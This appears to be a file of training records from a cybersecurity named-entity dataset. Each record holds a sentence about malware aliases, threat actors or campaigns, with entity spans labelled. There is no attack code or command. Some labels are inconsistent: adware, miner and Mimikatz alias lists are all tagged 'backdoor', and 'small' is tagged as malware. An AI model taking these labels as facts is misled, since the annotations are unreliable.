{"text": "A backdoor also known as: W32.FamVT.DebrisB.Worm Trojan/W32.Csyr.3584.C Worm.Win32.Debris!O W32/Csyr.A!Eldorado Win32/Tnega.FeZbcZD WORM_GAMARUE.SMB Win.Adware.Downware-239 Worm.Win32.Debris.p Trojan.Win32.Drop.brprwz Worm.Win32.Bundpil.T Trojan.MulDrop4.25343 WORM_GAMARUE.SMB BehavesLike.Win32.Worm.zz W32/Csyr.A!Eldorado Trojan/Csyr.a TR/Zusy.358421 Trojan/Win32.Csyr Trojan.Zusy.DA717 Worm.Gamarue Worm.Win32.Debris.p Trojan:Win32/Topini.A Worm/Win32.Bundpil.R63957 Worm.Gamarue Trj/Zbot.M Trojan.Win32.Csyr.A W32/Bundpil.T!worm Worm.Win32.Gamarue.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003498", "source": "cyner2_train"}}
{"text": "A backdoor also known as: RemoteAdmin.Win32.eSurveiller!O Trojan.VB.Win32.68501 Trojan/VB.nqz TSPY_ESURVEILLER_DC07000D.UVPA Spyware.ESurveiller TSPY_ESURVEILLER_DC07000D.UVPA Win.Trojan.Infostealer-5 Backdoor.Win32.VB.ppb Trojan.Win32.Dwn.ssuio Trojan.Win32.VB.1452000 Troj.Infostealer.lDrj Trojan.DownLoader1.64229 not-a-virus:RemoteAdmin.Win32.eSurveiller Trojan.Strictor.D2473 Backdoor.Win32.VB.ppb Unwanted/Win32.Radmin.R25253 Backdoor.VB Trj/CI.A Trojan.Infostealer Win32.Backdoor.Vb.Lnns Trojan.DownLoader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003500", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Delf.Inject.Z Trojan-Dropper.Win32.Mudrop!O Hacktool.Passview Trojan.Delf.Inject.Z Trojan/Dropper.Mudrop.ew TROJ_DROPPER.HVW Win32.Worm.AutoRun.ij W32/Risk.BDUN-6545 TROJ_DROPPER.HVW Win.Trojan.Delf-3744 Trojan.Delf.Inject.Z Trojan-Dropper.Win32.Mudrop.ew Trojan.Delf.Inject.Z Trojan.Win32.Mudrop.crqisw Trojan.Win32.MulDrop.1431634 Trojan.Delf.Inject.Z TrojWare.Win32.TrojanDropper.Mudrop.~RA Trojan.Delf.Inject.Z Trojan.MulDrop.12722 Dropper.Mudrop.Win32.77 BehavesLike.Win32.PUP.tc W32/Dropper.GWJ TrojanDropper.Mudrop.fy TR/Spy.Ftput.C Trojan[PSW]/Win32.LdPinch Trojan.Delf.Inject.Z Trojan-Dropper.Win32.Mudrop.ew PWS:Win32/Sounli.A Dropper/Win32.Mudrop.C138252 TrojanPSW.Pinch Trojan.PWS.LdPinch!Csxdj/6mZgk Trojan-Dropper.Win32.Mudrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003502", "source": "cyner2_train"}}
{"text": "RedLine Stealer's evasive spear-phishing campaign targets the hospitality industry.", "spans": {"THREAT_ACTOR: RedLine Stealer's": [[0, 17]], "THREAT_ACTOR: spear-phishing campaign": [[26, 49]], "ORGANIZATION: the hospitality industry.": [[58, 83]]}, "info": {"id": "cyner2_train_003503", "source": "cyner2_train"}}
{"text": "Web application vulnerabilities are like doorways: you never know who or what will walk through.", "spans": {"VULNERABILITY: Web application vulnerabilities": [[0, 31]]}, "info": {"id": "cyner2_train_003504", "source": "cyner2_train"}}
{"text": "Threat actors with strategic interest in the affairs of other governments and civil society organizations have been launching targeted exploitation campaigns for years.", "spans": {"THREAT_ACTOR: Threat actors": [[0, 13]], "ORGANIZATION: governments": [[62, 73]], "ORGANIZATION: civil society organizations": [[78, 105]], "THREAT_ACTOR: exploitation campaigns": [[135, 157]]}, "info": {"id": "cyner2_train_003505", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9984 TR/AD.Corinrat.sejyy Trojan.Application.MSILPerseus.D535 Ransom:MSIL/PentagonRat.A Trj/GdSda.A Win32/Application.478", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003506", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Win32.VBKrypt.3!O Trojan.Vbot.S15507 Downloader.VB.Win32.107566 Trojan/AntiAV.out Win32.Trojan.WisdomEyes.16070401.9500.9933 Trojan.Win32.AntiAV.cqff Trojan.Win32.AntiAV.bbnaxd Trojan.MulDrop3.35749 Trojan.AntiAV.abe TR/Offend.7084277.1 Trojan:Win32/Vbot.T Trojan.Win32.AntiAV.cqff Downloader/Win32.VB.C136965 Trojan.AntiAV Win32.Trojan.Antiav.Wmiq Trojan.AntiAV!kRLKkhVQepY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003508", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.RazyNHmA.Trojan Trojan.Waldek Trojan.Symmi.D100C4 WORM_HPKASIDET.SM0 Win32.Trojan.Kryptik.aio WORM_HPKASIDET.SM0 Win.Trojan.Betabot-5 Trojan.Win32.NgrBot.evigbp BackDoor.IRC.NgrBot.566 BehavesLike.Win32.MultiPlug.cm W32/Trojan.HZWF-1490 TR/Crypt.Xpack.tsufk Trojan:Win32/Radonskra.B Trojan/Win32.Upbot.C1483736 Trj/GdSda.A Trojan-Ransom.Raa W32/Kryptik.FACF!tr Win32/Trojan.a93", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003509", "source": "cyner2_train"}}
{"text": "Attackers are continually trying to find new ways to target users with malware sent via email.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "ORGANIZATION: users": [[60, 65]], "MALWARE: malware": [[71, 78]]}, "info": {"id": "cyner2_train_003510", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Win32.Trojan.WisdomEyes.16070401.9500.9999 Zum.Rastarby.4 Trojan.Win32.Miner.tfkd Zum.Rastarby.4 Riskware.Win64.BtcMine.dugwfh Uds.Dangerousobject.Multi!c Win32.Trojan.Miner.Dux BehavesLike.Win32.AdwareLinkury.tc Zum.Rastarby.4 Trojan.Win32.Miner.tfkd Trojan:Win64/HelaMiner.A Trojan.Miner BAT/CoinMiner.YJ Trj/CI.A Win32/Trojan.769", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003512", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.ZXShell BKDR_ZXSHELL.D Backdoor.Win32.ZXShell.v Backdoor.W32.Zxshell!c BKDR_ZXSHELL.D BDS/ZXShell.999712 W32/ZxShell.D!tr Trojan.Kazy.DB0C8D Backdoor:Win32/Zxshell.A!dha Backdoor/Win32.ZXShell.N1663696022 Win32.Backdoor.Zxshell.Pfjm Trojan.Win32.Zxshell Win32/Backdoor.6e4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003514", "source": "cyner2_train"}}
{"text": "the worm was back, and it was both more and less effective.", "spans": {"MALWARE: worm": [[4, 8]]}, "info": {"id": "cyner2_train_003515", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.BitCoinMiner Riskware.Win32.BtcMine.exrhsn Trojan.Win32.Z.Strictor.1934848 Win32.Trojan.Strictor.Akpc Tool.BtcMine.982 BehavesLike.Win32.BadFile.tc Trojan.Win32.CoinMiner TR/CoinMiner.vctqx Trojan.Strictor.D2613C Trojan.Win64.BitCoinMiner W32/CoinMiner.AZU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003516", "source": "cyner2_train"}}
{"text": "The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim's system regardless whether macros are enabled.", "spans": {"SYSTEM: DDE": [[11, 14]], "SYSTEM: PowerShell": [[20, 30]], "THREAT_ACTOR: attacker": [[41, 49]], "SYSTEM: a victim's system": [[79, 96]], "MALWARE: macros": [[116, 122]]}, "info": {"id": "cyner2_train_003517", "source": "cyner2_train"}}
{"text": "In addition to Chipotle, the hackers appears to be targeting national restaurant franchises Baja Fresh and Ruby Tuesday, according to malware samples and other evidence CyberScoop obtained.", "spans": {"ORGANIZATION: Chipotle,": [[15, 24]], "THREAT_ACTOR: hackers": [[29, 36]], "ORGANIZATION: national restaurant franchises Baja Fresh and Ruby Tuesday,": [[61, 120]], "MALWARE: malware": [[134, 141]], "ORGANIZATION: CyberScoop": [[169, 179]]}, "info": {"id": "cyner2_train_003519", "source": "cyner2_train"}}
{"text": "ThreatLabz has determined that Nevada shares significant code with the Rust-based variant of Nokoyawa.", "spans": {"ORGANIZATION: ThreatLabz": [[0, 10]], "MALWARE: Nevada": [[31, 37]], "MALWARE: the Rust-based variant of Nokoyawa.": [[67, 102]]}, "info": {"id": "cyner2_train_003520", "source": "cyner2_train"}}
{"text": "This past week, our team has identified a group of malware samples that matched behavioral heuristics for multiple known malware families.", "spans": {"ORGANIZATION: team": [[20, 24]], "MALWARE: group of malware": [[42, 58]], "MALWARE: malware families.": [[121, 138]]}, "info": {"id": "cyner2_train_003521", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ShellKillUnixOSPtv.Worm Trojan.Script.BXM Trojan.VBS.Kofornix.A Trojan.KillDisk.MBR Troj.W32.EraseMBR.d!c Trojan.Jokra Win32/DarkSeoul.AA UNIX_KILLMBR.A Trojan.Win32.EraseMBR.d Trojan.Script.BXM Trojan.Script.EraseMBR.bxxrlr Trojan.Script.BXM Trojan.Script.BXM Trojan.KillMBR.168 BASH/Kast.A!tr Trojan.Script.BXM Trojan.Win32.EraseMBR.d Trojan:SH/Kofornix.A Trojan.SH.KilMBR Win32.Trojan.Erasembr.Wtnk Trojan.Win32.EraseMBR Trojan.Script.BXM Win32/Trojan.6f6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003522", "source": "cyner2_train"}}
{"text": "A backdoor also known as: I-Worm.Plesa.r3 Trojan/Plesa.a IRC-Worm.Plesa!VraGnsrR3Es W32/Plesa.A@p2p W32.SillyP2P IRC/Plesa.A WORM_PLESA.B Worm.IRC.Plesa.A IRC-Worm.Win32.Plesa.a Trojan.Win32.Plesa.fuyf Worm.Win32.A.IRC-Plesa.34304[h] Worm.IRC.Plesa.A Win32.HLLW.Plesa Worm.Plesa.Win32.1 WORM_PLESA.B BehavesLike.Win32.Sality.nc W32/Plesa.BXPQ-5568 I-Worm/Plesa.a WORM/Irc.Plesa.A.2 W32/Plesa.A!worm.irc Worm[IRC]/Win32.Plesa W32.W.Plesa.a!c Win32/Plesa.worm.34304 Worm:Win32/Plesa.A Win32.Worm-irc.Plesa.Svqx IRC-Worm/Plesa.A Worm.Win32.Plesa.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003526", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Spybot.Worm W32/Packed_Packman.A Virus.Win32.Heur.c Backdoor.Rbot!IK Win32.HLLW.MyBot.based Backdoor.Rbot BackDoor.RBot.IA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003527", "source": "cyner2_train"}}
{"text": "In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization.", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[13, 39]], "MALWARE: small": [[53, 58]], "THREAT_ACTOR: phishing campaign": [[68, 85]], "ORGANIZATION: a government organization.": [[95, 121]]}, "info": {"id": "cyner2_train_003529", "source": "cyner2_train"}}
{"text": "What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists, human rights defenders, trade unions and labour rights activists, many of whom are seemingly involved in the issue of migrants' rights in Qatar and Nepal.", "spans": {"THREAT_ACTOR: well-engineered campaign": [[36, 60]], "ORGANIZATION: journalists, human rights defenders, trade unions": [[148, 197]], "ORGANIZATION: labour rights activists,": [[202, 226]]}, "info": {"id": "cyner2_train_003533", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.Coced.2.4.6 Trojan.PWS.Coced.2.4.6 Trojan.PWS.Coced.2.4.6 Trojan.Win32.Coced.bhwfkh Hacktool.PWSteal Naebi.246 Trojan-PSW.Win32.Coced.246 Trojan.PWS.Coced!FBVVvUBVA1M Trojan.PWS.Coced.2.4.6 TrojWare.Win32.PSW.Coced.246 Trojan.PWS.Coced.2.4.6 Trojan.PWS.Coced.246 Trojan.Coced.Win32.158 W32/Risk.HJYL-5906 Trojan/PSW.Coced.246 TR/PSW.Coced.246 Trojan[PSW]/Win32.Coced Win32.PSWTroj.Coced.kcloud PWS:Win32/Coced.2_46 Win-Trojan/Coced.19456 Trojan.PWS.Coced.2.4.6 Trojan.PWS.Coced.2.4.6 TrojanPSW.Coced Win32/PSW.Coced.246 Win32.Init.QQRob.dkwv W32/Coced.246!tr.pws PSW.Coced Trojan.Win32.InfoStealer.AYJO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003534", "source": "cyner2_train"}}
{"text": "Some of the new 2014-2015 Duqu infections are linked to the P5+1 events and venues related to the negotiations with Iran about a nuclear deal.", "spans": {"MALWARE: Duqu infections": [[26, 41]]}, "info": {"id": "cyner2_train_003536", "source": "cyner2_train"}}
{"text": "This latest attack potentially materially impacts one of the primary countermeasures employed against wiper attacks: Virtual Desktop Interface snapshots.", "spans": {"MALWARE: wiper": [[102, 107]], "SYSTEM: Virtual Desktop Interface snapshots.": [[117, 153]]}, "info": {"id": "cyner2_train_003538", "source": "cyner2_train"}}
{"text": "One is CVE-2012-1856, reinvigorated with a novel ROP chain to bypass ASLR and deliver the uWarrior payload.", "spans": {"MALWARE: uWarrior payload.": [[90, 107]]}, "info": {"id": "cyner2_train_003539", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packer.YodaBased.B Packer.YodaBased.B Packer.YodaBased.B Win32.Trojan.WisdomEyes.16070401.9500.9994 Packer.YodaBased.B Trojan.Win32.AutoRun.omxo Packer.YodaBased.B Packed.Win32.Klone.~KE Packer.YodaBased.B BackDoor.Attacker BehavesLike.Win32.Downloader.pc Backdoor.Win32.Hupigon Trojan/PSW.GamePass.msl TrojanDownloader:Win32/Murka.A Worm.Win32.Autorun.45568.I Packer.YodaBased.B TScope.Malware-Cryptor.SB Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003540", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader-72360 Adware.BDSearch.1 Trojan.DownLoad.40686 Win32/Jhee.H Adware.Rugo Trojan:Win32/Jhee.G Adware.BDSearch.1 Adware.WSearch.O Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003541", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodfa8.Trojan.1d71 Trojan.Keylogger.NAD Trojan.Tuma.r4 Trojan.Keylogger.NAD Trojan/Spy.oop Trojan.Keylogger.NAD backdoor.win32.hupigon.fn W32/Trojan3.KYS Trojan.Win32.Tuma.deaiow Trojan.Win32.Z.Keylogger.20480.K[h] Troj.Keylogger.Nad!c Trojan.Keylogger.NAD Trojan.Keylogger.NAD Trojan.Keylogger.Win32.35586 W32/Trojan.GLTF-2077 TR/Tuma.A W32/Keylog.A!tr.spy Trojan.Keylogger.NAD Trojan:Win32/Tuma.A TrojanSpy.KeyLogger!6zo304KOTCM Trojan.Win32.Spy Trojan.Keylogger.NAD PSW.KeyLogger.CUC Win32/Trojan.Keylog.761", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003543", "source": "cyner2_train"}}
{"text": "In the last month Trustwave was engaged by two separate hospitality clients, and one restaurant chain for investigations by an unknown attacker or attackers.", "spans": {"ORGANIZATION: Trustwave": [[18, 27]], "ORGANIZATION: hospitality clients,": [[56, 76]], "ORGANIZATION: restaurant chain": [[85, 101]], "THREAT_ACTOR: an unknown attacker": [[124, 143]], "THREAT_ACTOR: attackers.": [[147, 157]]}, "info": {"id": "cyner2_train_003544", "source": "cyner2_train"}}
{"text": "Malware writers have always sought to develop feature-rich, easy to use tools that are also somewhat hard to detect via both host- and network-based detection systems.", "spans": {"THREAT_ACTOR: Malware writers": [[0, 15]], "MALWARE: tools": [[72, 77]], "SYSTEM: host-": [[125, 130]], "SYSTEM: network-based detection systems.": [[135, 167]]}, "info": {"id": "cyner2_train_003545", "source": "cyner2_train"}}
{"text": "Unit 42 researchers recently observed an unusually clever spambot's attempts to increase delivery efficacy by abusing reputation blacklist service APIs. Rather than sending spam as soon as the host is infected, the bot checks common blacklists to confirm its e-mails will actually be delivered, and if not, shuts itself down.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "VULNERABILITY: abusing reputation blacklist service APIs.": [[110, 152]], "SYSTEM: host": [[193, 197]], "MALWARE: bot": [[215, 218]]}, "info": {"id": "cyner2_train_003546", "source": "cyner2_train"}}
{"text": "Beginning in November 2016, Kaspersky Lab observed a new wave of wiper attacks directed at multiple targets in the Middle East.", "spans": {"ORGANIZATION: Kaspersky Lab": [[28, 41]]}, "info": {"id": "cyner2_train_003547", "source": "cyner2_train"}}
{"text": "No traces were left on affected systems apart from files from the exploit process if the target machine wasn't interesting to the Lurk operators.", "spans": {"SYSTEM: affected systems": [[23, 39]], "VULNERABILITY: the exploit process": [[62, 81]], "SYSTEM: machine": [[96, 103]], "THREAT_ACTOR: the Lurk operators.": [[126, 145]]}, "info": {"id": "cyner2_train_003549", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.Disfa.hfpj.FC.4367 Win32.Trojan.WisdomEyes.16070401.9500.9998 Exploit.Win32.Strictor.etpuwg Win32.Trojan.Fakedoc.Auto Trojan.Injector.Win32.565843 W32/Trojan.BKGU-8860 Trojan.Strictor.D1A871 Ransom.HiddenTear Trojan.Injector!WLrriQRdMeM Trj/GdSda.A Win32/Trojan.97a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003550", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.JS.Downloader.IDO Trojan.Downloader.JS.3612 Trojan.JS.Downloader.IDO Trojan.Malscript!html JS_BADRABBIT.A Trojan.JS.Downloader.IDO Js.Trojan.Js.Wrgf Trojan.JS.Downloader.IDO JS_BADRABBIT.A Trojan.FLCY-1 TrojanDownloader:JS/Tibbar.A Trojan.JS.Downloader.IDO Trojan.JS.Downloader.IDO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003551", "source": "cyner2_train"}}
{"text": "FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: campaign": [[39, 47]], "ORGANIZATION: hospitality sector": [[62, 80]], "THREAT_ACTOR: Russian actor APT28.": [[98, 118]]}, "info": {"id": "cyner2_train_003552", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Adware.Virtumonde Win32/Adware.Virtumonde Trojan:Win32/Iceroe.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003553", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_JORIK_0000023.TOMA Trojan.Win32.Snojan.gi Trojan.Win32.Autoruner1.wcikr MULDROP.Trojan BehavesLike.Win32.Downloader.mz Trojan/Win32.FirstInj TrojanDownloader:Win32/Bleyr.A Trojan.Zusy.D8B2B Win-Trojan/Patched.25600.B BScope.Trojan.SvcHorse.01643 Win32/AntiAV.NIA Trojan.FirstInj!zbN/akDwH70 Trojan.Win32.Jorik W32/FirstInj.KAP!tr.bdr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003554", "source": "cyner2_train"}}
{"text": "A backdoor also known as: MSIL.Trojan.Kryptik.k W32/Trojan.IINR-0738 BehavesLike.Win32.Trojan.vc Trojan:Win32/Gielclas.A!gfc Trj/CI.A Trojan.Injector!QI3sWN009L0 Trojan.MSIL.Injector", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003555", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Trojan.Win32.BQHK0411.dfyyqz Uds.Dangerousobject.Multi!c Win32.Trojan.Strictor.Wvar Trojan.Strictor.DCD3E SpamTool.Skype! MSIL/SpamTool_Skype.L!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003556", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Email-Worm.Win32!O Happy99.Worm W32/Ska.exe.worm Win32.Trojan.WisdomEyes.16070401.9500.9919 Happy99.Worm Win32/Happy99.10000!Dropper Win.Trojan.Happy99-2 Email-Worm.Win32.Happy Win95.Spanska.10000 TR/Happy.69 Trojan.Heur.E705EC Email-Worm.Win32.Happy Worm:Win32/Ska.A@m Win32.Worm-email.Happy.Wrqu Win32.Ska.A Email-Worm.Win32.Happy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003557", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Nabony.AP3 Worm.AutoRun Trojan.Heur.PT.EEF50D Win32.Trojan.WisdomEyes.16070401.9500.9996 W32.SillyFDC Win32/Xema.H TSPY_AUTORUN_BJ022DBF.TOMC Win.Worm.Autorun-8605 Trojan.Win32.MLW.rupxe Win32.Worm.Autorun.Akyt Worm.Win32.Nabony.A TSPY_AUTORUN_BJ022DBF.TOMC BehavesLike.Win32.Dropper.cz WORM/Autorun.YD Worm:Win32/Nabony.A Trojan.Win32.A.Scar.1183299 Trojan/Win32.HDC.C12022 Hoax.Blocker W32/AutoRun.YD!tr Win32/Worm.0fe", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003562", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9988 MSIL/Filecoder.FF Ransom_Vortex.R004C0DKT17 Trojan.Win32.Filecoder.evqvnb Ransom_Vortex.R004C0DKT17 BehavesLike.Win32.Trojan.nc W32/Trojan.METU-7441 TrojanSpy.MSIL.nar TR/Dropper.MSIL.bpldq MSIL/Filecoder.FF!tr Ransom:MSIL/Vortex.A Trojan/Win32.Ransomlock.C2275506 Trojan.Ransom.Vortex Ransom.Vortex Trojan-Ransom.FileCoder Trj/GdSda.A Win32/Trojan.Dropper.62b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003563", "source": "cyner2_train"}}
{"text": "In the era of APT's, it feels like something is amiss when there is a forum of governments and no malware arises.", "spans": {"THREAT_ACTOR: APT's,": [[14, 20]], "ORGANIZATION: governments": [[79, 90]], "MALWARE: malware": [[98, 105]]}, "info": {"id": "cyner2_train_003564", "source": "cyner2_train"}}
{"text": "Ursnif is a data stealer and a downloader with a lot of abilities to steal data from installed browsers and other applications such as Microsoft Outlook.", "spans": {"MALWARE: Ursnif": [[0, 6]], "MALWARE: data stealer": [[12, 24]], "MALWARE: downloader": [[31, 41]], "VULNERABILITY: installed browsers": [[85, 103]], "SYSTEM: Microsoft Outlook.": [[135, 153]]}, "info": {"id": "cyner2_train_003566", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanpws.Trah Trojan[PSW]/Win32.Trah PWS:Win32/Trah.B PUA.DealPly.Da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003567", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Chepdu.R Troj.W32.BHO.liE5 Win32.Trojan.WisdomEyes.16070401.9500.9828 TrojWare.Win32.BHO.SC Win32.HLLW.Lime.2312 BehavesLike.Win32.BadFile.dm Trojan-Downloader.Win32.Banload TR/Chepdu.IA Trojan.Graftor.D1A2F Trojan:Win32/Comquab.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003568", "source": "cyner2_train"}}
{"text": "It was only a matter of time, however, for other cybercriminals to follow suit.", "spans": {"THREAT_ACTOR: cybercriminals": [[49, 63]]}, "info": {"id": "cyner2_train_003569", "source": "cyner2_train"}}
{"text": "In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.", "spans": {"MALWARE: threat": [[49, 55]], "SYSTEM: system": [[67, 73]]}, "info": {"id": "cyner2_train_003572", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.DoS.119296 DoS.Win32.Nenet Trojan.Win32.Nenet.dinmxr Backdoor.W32.Singu.lhbk FDOS.Nenet.32768 Tool.Win32.69ACF863 Backdoor.Win32.Rbot DDOS/Nenet.A DoS.Win32.Nenet DoS.Nenet DoS/Nenet.B Win32/Virus.DDoS.672", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003573", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Icbot.FC.848 Troj.Spy.Msil.Keylogger!c Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan-Spy.MSIL.Keylogger.cfle Trojan.Win32.IRCBot.efyfpt TrojWare.MSIL.IRCBOT.B Trojan.MSIL.IRCBot TrojanSpy.MSIL.usk MSIL/IRCBot.BK!tr Trojan[Spy]/MSIL.IrcGhost Trojan.Razy.DFC68 Trojan.Win32.Z.Ircbot.77312.A Trojan-Spy.MSIL.Keylogger.cfle Trojan:MSIL/Icbot.A!bit Msil.Trojan-spy.Keylogger.Hssn TrojanSpy.Keylogger!yn+qYVv4uIw Trj/GdSda.A Win32/Trojan.Spy.00e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003575", "source": "cyner2_train"}}
{"text": "Despite global efforts to detect and disrupt the distribution of CryptoWall, adversaries have continued to innovate and evolve their craft, leading to the release of CryptoWall 4.", "spans": {"THREAT_ACTOR: CryptoWall, adversaries": [[65, 88]], "MALWARE: CryptoWall 4.": [[166, 179]]}, "info": {"id": "cyner2_train_003576", "source": "cyner2_train"}}
{"text": "In its most recent campaign, Tick employed spear-phishing emails and compromised a number of Japanese websites in order to infect a new wave of victims.", "spans": {"THREAT_ACTOR: campaign,": [[19, 28]], "THREAT_ACTOR: Tick": [[29, 33]], "THREAT_ACTOR: spear-phishing emails": [[43, 64]]}, "info": {"id": "cyner2_train_003577", "source": "cyner2_train"}}
{"text": "We named the attack BITTER based on the network communication header used by the latest variant of remote access tool RAT used.", "spans": {"MALWARE: variant": [[88, 95]], "MALWARE: remote access tool RAT": [[99, 121]]}, "info": {"id": "cyner2_train_003580", "source": "cyner2_train"}}
{"text": "Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand.", "spans": {"SYSTEM: compromised systems": [[12, 31]], "MALWARE: Bookworm": [[56, 64]]}, "info": {"id": "cyner2_train_003582", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanpws.Mimikatz Win32.Trojan.WisdomEyes.16070401.9500.9886 Trojan.Win32.Mimikatz.eoptjl Troj.Psw.W32.Mimikatz!c BehavesLike.Win32.PUPXAB.jh W32/Application.SMPV-5402 Trojan.PSW.Mimikatz.sw Trojan[PSW]/Win32.Mimikatz Application.Mimikatz.2 HackTool:Win32/WDigest.A Trj/GdSda.A Win32.Trojan-qqpass.Qqrob.Eaxn hacktool.mimikatz Win32/Application.IM.f6f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003584", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Banker.Win32.BestaFera.annq Trojan.Win32.Demp.bozwca BehavesLike.Win32.Injector.th TR/Avgesi.B.1 Trojan:Win32/Avgesi.B Trojan-Banker.Win32.BestaFera.annq Win32.Trojan-dropper.Demp.Lnxz Trojan-Downloader.Win32.Pher W32/Demp.PJN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003587", "source": "cyner2_train"}}
{"text": "While the malware attack has not been exclusively targeting the region, it has been focusing on the South Korean manufacturing industry.", "spans": {"ORGANIZATION: manufacturing industry.": [[113, 136]]}, "info": {"id": "cyner2_train_003588", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.C0FB Trojan.Dovs TSPY_EMOTET.AUSYYON Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Emotet TSPY_EMOTET.AUSYYON Win.Trojan.Emotet-6410462-0 Win32.Trojan-Spy.Emotet.IT Trojan.Win32.Dovs.esh Trojan.Win32.Dovs.ewnrtt Troj.W32.Dovs!c BehavesLike.Win32.PWSZbot.cc W32.Trojan.Emotet TR/Crypt.ZPACK.sbdbq Trojan/Win32.Dovs Trojan.Win32.Dovs.esh Trojan/Win32.Emotet.R216875 Trojan.Emotet Trj/RnkBend.A Win32.Trojan.Dovs.Szuw Trojan.Win32.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003589", "source": "cyner2_train"}}
{"text": "Today, we are looking at an exploit kit that we have not seen before.", "spans": {"MALWARE: exploit kit": [[28, 39]]}, "info": {"id": "cyner2_train_003591", "source": "cyner2_train"}}
{"text": "This vulnerability is mostly known as SambaCry after the famous WannaCry attack targeting Windows systems vulnerable to EternalBlue SMB exploit.", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "MALWARE: SambaCry": [[38, 46]], "MALWARE: WannaCry": [[64, 72]], "SYSTEM: Windows systems": [[90, 105]], "VULNERABILITY: vulnerable": [[106, 116]], "MALWARE: EternalBlue SMB exploit.": [[120, 144]]}, "info": {"id": "cyner2_train_003592", "source": "cyner2_train"}}
